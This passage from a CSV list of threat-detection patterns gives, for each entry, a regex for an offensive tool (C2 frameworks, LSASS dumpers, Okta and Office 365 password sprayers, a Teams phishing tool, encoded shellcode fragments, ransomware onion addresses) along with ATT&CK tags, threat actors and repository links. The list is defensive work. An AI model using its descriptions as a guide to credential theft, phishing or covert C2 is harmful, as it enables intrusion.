T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","53832" "*Octoberfest7/TeamsPhisher*",".{0,1000}Octoberfest7\/TeamsPhisher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","53833" "*octopus.py *",".{0,1000}octopus\.py\s.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","53834" "*OEP_Hiijack_Inject_Load*",".{0,1000}OEP_Hiijack_Inject_Load.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","53835" "*offensive_notion.exe*",".{0,1000}offensive_notion\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53836" "*offensive_notion_darwin_*",".{0,1000}offensive_notion_darwin_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53837" "*offensive_notion_linux_*",".{0,1000}offensive_notion_linux_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53838" "*offensive_notion_win_*.exe*",".{0,1000}offensive_notion_win_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53839" "*OffensiveCSharp*DriverQuery*",".{0,1000}OffensiveCSharp.{0,1000}DriverQuery.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53840" "*OffensiveCSharp*ETWEventSubscription*",".{0,1000}OffensiveCSharp.{0,1000}ETWEventSubscription.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53841" "*OffensiveCSharp-master*",".{0,1000}OffensiveCSharp\-master.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53842" "*OffensiveLua-main*",".{0,1000}OffensiveLua\-main.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","53843" "*Offensive-Panda/LsassReflectDumping*",".{0,1000}Offensive\-Panda\/LsassReflectDumping.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","53844" "*Offensive-Panda/ShadowDumper/*",".{0,1000}Offensive\-Panda\/ShadowDumper\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","53845" "*Offensive-Windows-IPC-1-NamedPipes.*",".{0,1000}Offensive\-Windows\-IPC\-1\-NamedPipes\..{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","53846" "*office2john.py*",".{0,1000}office2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53847" "*office365userenum.*",".{0,1000}office365userenum\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53848" "*Office-DDE-Payloads*",".{0,1000}Office\-DDE\-Payloads.{0,1000}","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). 
Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","N/A","7","638","155","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z","53849" "*Offline_WinPwn.ps1*",".{0,1000}Offline_WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","53855" "*offlinereg-win32.exe*",".{0,1000}offlinereg\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53856" "*offlinereg-win64.exe*",".{0,1000}offlinereg\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53857" "*offsecginger/koadic*",".{0,1000}offsecginger\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","53858" "*OFTC/tor2web/*",".{0,1000}OFTC\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","53859" "*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*",".{0,1000}OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA\=.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","53860" "*OG-Sadpanda/SharpCat*",".{0,1000}OG\-Sadpanda\/SharpCat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","53861" 
"*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","53862" "*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","53863" "*OG-Sadpanda/SharpZippo*",".{0,1000}OG\-Sadpanda\/SharpZippo.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z","53864" 
"*Oh365UserFinder.git*",".{0,1000}Oh365UserFinder\.git.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53865" "*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53866" "*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. 
or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53867" "*Oh365UserFinder-main*",".{0,1000}Oh365UserFinder\-main.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53868" "*oh-az/NoArgs*",".{0,1000}oh\-az\/NoArgs.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","53869" "*oHD9EjJcITqhVYleFRX47sNLtKx6gWnG8wU0iaP5C1pdSrbMuZfBzmyvk23OAQ*",".{0,1000}oHD9EjJcITqhVYleFRX47sNLtKx6gWnG8wU0iaP5C1pdSrbMuZfBzmyvk23OAQ.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ""all in one"" Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","53870" "*ohmva4gbywokzqso.onion*",".{0,1000}ohmva4gbywokzqso\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53871" "*ohmva4gbywokzqso.onion.cab*",".{0,1000}ohmva4gbywokzqso\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53872" "*ohmva4gbywokzqso.tor2web.org*",".{0,1000}ohmva4gbywokzqso\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53873" "*OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx*",".{0,1000}OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH\/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","53874" "*ojggmchlghnjlapmfbnjholfjkiidbch*",".{0,1000}ojggmchlghnjlapmfbnjholfjkiidbch.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53876" "*Okta-Password-Sprayer*",".{0,1000}Okta\-Password\-Sprayer.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential 
Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","1","N/A","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","53877" "*oldboy21/LDAP-Password-Hunter*",".{0,1000}oldboy21\/LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","53878" "*oldboy21/SMBAT*",".{0,1000}oldboy21\/SMBAT.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","53879" "*oldboy21/SMBSR*",".{0,1000}oldboy21\/SMBSR.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","53880" "*OLDNamedPipeServer.ps1*",".{0,1000}OLDNamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","53881" "*OleViewDotNet.psd1*",".{0,1000}OleViewDotNet\.psd1.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","53882" "*Oliver-1-1/GhostMapper*",".{0,1000}Oliver\-1\-1\/GhostMapper.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","53883" 